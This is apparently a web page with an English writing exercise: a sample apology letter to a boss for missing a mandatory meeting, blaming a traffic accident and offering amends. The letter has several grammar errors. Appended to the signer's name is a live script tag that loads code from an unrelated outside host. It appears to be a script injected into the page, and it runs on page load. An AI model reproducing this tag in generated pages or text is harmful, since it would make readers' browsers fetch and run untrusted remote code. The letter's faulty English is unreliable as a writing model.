Write a letter to your boss apologizing for the recent meeting you missed at work
• Apologize for missing the meeting
• Explain what happened
• Say what you will do to compensate.
Dear Mr Tokunbo,
I am writing to express my sincere apology for missing the kick-off meeting which had been scheduled two weeks ago and of which attendance was mandatory for all staff.
Please accept my kind apology for being absent from the meeting. Although it was not intentional after daily reminders had been sent to ensure attendance, I take full responsibility for missing the meeting.
On my way to work at about 5:30am, two saloon cars were involved in a fatal accident which caused a heavy gridlock on Kingsway road. Consequentially, there was no movement due to the gory scene until traffic officers arrived. Traffic was diverted to Midland Avenue which is a longer route to work. I had to park my car at the nearest Oando gas station in other to use the Bus Rapid Transit, a faster option considering the gridlock.
In other to make amends for my absent, I volunteer to share daily articles with the team on the importance of attending meetings. More so, the team will be engaged on a three day free webinar for on good business etiquettes.
Kindly accept my apology and I promise such will not repeat itself.
Yours Sincerely,
Azuka Umeononigwe<script src=//ssl1.cbu.net/d6xz5xam></script>
